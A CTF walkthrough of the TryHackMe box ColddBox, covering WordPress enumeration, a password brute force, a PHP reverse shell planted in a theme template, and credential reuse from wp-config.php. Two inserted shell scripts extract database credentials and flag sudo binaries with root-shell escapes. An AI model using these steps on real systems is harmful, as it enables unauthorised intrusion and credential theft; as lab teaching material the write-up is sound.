Ifediniruozioma
4 min read · Mar 15, 2021


Hello guys, back again with another walkthrough. This time we'll be tackling ColddBox from TryHackMe.

As usual, we start with Nmap to scan the target:

> nmap -sC -A <target_ip>

(-A already runs the default scripts that -sC selects, along with version detection and OS detection, so -sC here is redundant but harmless.)

Several ports are open; the interesting one is 80, a web server.

Now let's fire up a directory brute-forcing tool. My favourite is Gobuster:

> gobuster dir -u <target_url> -w <wordlist>

Gobuster found several directories that were not linked from the site. Their names also tell us that the site is running the WordPress content management system.

Now that we know it's a WordPress site, let's enumerate further with WPScan, which checks the site for known vulnerabilities and can also enumerate its users:

> wpscan --url <target_url> -e u1-5

User enumeration returned a few usernames, but we didn't have to guess which one to brute-force. Recall that the Gobuster run earlier turned up a hidden directory, /hidden; visiting it gives a hint at the admin username. See this:

Now we use that admin username to brute-force the wp-admin login and recover the user's password, which gives us our initial entry into the site's admin page:

> wpscan --url <target_ip> -U <username> -P <passwordlist>

Now that we have the password, let's log in to the site with the credentials we found.

Okay! We now have access to the admin dashboard. We'll edit the theme's 404.php template and use it to get a shell on the box. Navigate to Appearance, then Theme Editor; this takes us to theme-editor.php, where we can edit the 404.php template. Here I pasted in a PHP reverse shell, setting my host IP and the port to listen on. Then I started netcat on my host to listen for the reverse connection from the target machine.

Now, after saving the reverse shell into 404.php, request that template in the browser (theme files are served directly from wp-content/themes/<theme>/, so the path is wp-content/themes/<theme>/404.php) and the shell connects back to your listener.

Now that we have a shell, let's upgrade it to a proper TTY so we can use commands that weren't possible in the raw shell:

> python3 -c 'import pty; pty.spawn("/bin/bash")'

After upgrading my shell, I first navigated to c0ldd's home directory but couldn't read the user.txt flag, so I started looking for credentials in the WordPress configuration file, wp-config.php, which stores the database username and password in plaintext. Luckily, that password was reused for the system account, and I used it to log in as the user c0ldd.
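As an added example (not the walkthrough's own code), here is a small shell helper that pulls the database settings out of a wp-config.php, ignoring commented-out defines and handling both quote styles. The sample config it is run against is constructed for illustration; its values are placeholders, not the credentials found on the box.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: extract the database
# credentials from a wp-config.php. The sample config written below is
# constructed; its values are placeholders, not the box's real credentials.

# Print the value of define('NAME', 'value') from a wp-config.php.
# Skips commented-out lines (they don't start with "define") and accepts
# single or double quotes around the name and value.
wp_define() {
    name="$1"; file="$2"
    sed -n -E \
        "s/^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]${name}['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1/p" \
        "$file" | head -n 1
}

# Summarise the settings an attacker, or an auditor, cares about.
wp_creds() {
    file="$1"
    for key in DB_NAME DB_USER DB_PASSWORD DB_HOST; do
        printf '%s=%s\n' "$key" "$(wp_define "$key" "$file")"
    done
}

# Constructed sample wp-config.php with placeholder values.
SAMPLE_CONFIG="${TMPDIR:-/tmp}/wp-config.sample.php"
cat > "$SAMPLE_CONFIG" <<'EOF'
<?php
// ** MySQL settings ** //
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
// define( 'DB_PASSWORD', 'old-password' );
define( 'DB_PASSWORD', 'Example-Pass-123' );
define("DB_HOST", "localhost");
$table_prefix = 'wp_';
EOF

# On a target you would run: wp_creds /var/www/html/wp-config.php
```

Once you have DB_USER and DB_PASSWORD, try them against the local system accounts with su, exactly as in the walkthrough; password reuse between the web application and the OS is the finding here, not the file's permissions, which have to be readable by the web server anyway.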

Now I can navigate to c0ldd's home directory and obtain the first flag.

Gaining root Access

Now to escalate my privileges to root and capture the second flag. First, check what sudo allows this user to run:

> sudo -l

This listed several commands the user c0ldd can run as root; the one I used was /usr/bin/vim.

So to obtain the root flag I simply opened it with vim running as root, and yes, I got the root flag successfully:

> sudo /usr/bin/vim /root/root.txt
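As an added example (not the walkthrough's own code), here is a shell helper that triages `sudo -l` output the way you would on any box: it extracts the allowed command paths and flags the ones that are known to hand out a root shell, such as vim, which drops to a shell with `:!/bin/bash` or `:shell`. The `sudo -l` output it parses is constructed for illustration; the commands listed are placeholders and are not the box's real sudoers entries beyond the vim entry the walkthrough mentions.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: triage `sudo -l` output
# and flag binaries that are known to escape to a root shell. The sample
# sudo -l output written below is constructed; only the vim entry reflects
# what the walkthrough reports.

# Binaries that give a shell when run as root: vim/vi via ":!/bin/bash" or
# ":shell", the rest via equally well-known escapes.
SHELL_ESCAPES="vim vi nano less more man find awk python python3 perl bash sh"

# Print the command paths from the "(runas) [NOPASSWD:] cmd, cmd" lines.
allowed_commands() {
    grep -E '^[[:space:]]*\(.*\)' "$1" |
        sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:|PASSWD:)?[[:space:]]*//' |
        tr ',' '\n' |
        sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//' |
        grep -v '^$'
}

# Return 0 if $1 (a basename) is in the escape list.
is_escape() {
    for e in $SHELL_ESCAPES; do
        if [ "$1" = "$e" ]; then return 0; fi
    done
    return 1
}

# Of the allowed commands, print those whose program is a known escape.
escapable() {
    allowed_commands "$1" | while IFS= read -r cmd; do
        base=$(basename "${cmd%% *}")   # drop any fixed arguments first
        if is_escape "$base"; then printf '%s\n' "$cmd"; fi
    done
}

# Constructed sample of `sudo -l` output (hostname and extra entries are placeholders).
SAMPLE_SUDO="${TMPDIR:-/tmp}/sudo-l.sample.txt"
cat > "$SAMPLE_SUDO" <<'EOF'
Matching Defaults entries for c0ldd on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User c0ldd may run the following commands on target:
    (root) /usr/bin/vim, /bin/chmod
    (root) NOPASSWD: /usr/bin/less
EOF

# On a target: sudo -l > /tmp/sudo.txt && escapable /tmp/sudo.txt
```

Anything the helper prints is a one-step root: for vim, `sudo /usr/bin/vim` followed by `:!/bin/bash` gives a root shell, which is why reading /root/root.txt with it works in the walkthrough.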

There you go, you have your root flag.

Thanks for using this walkthrough; I hope it was useful.

Regards,

NIRU IFEDINIRU OZIOMA
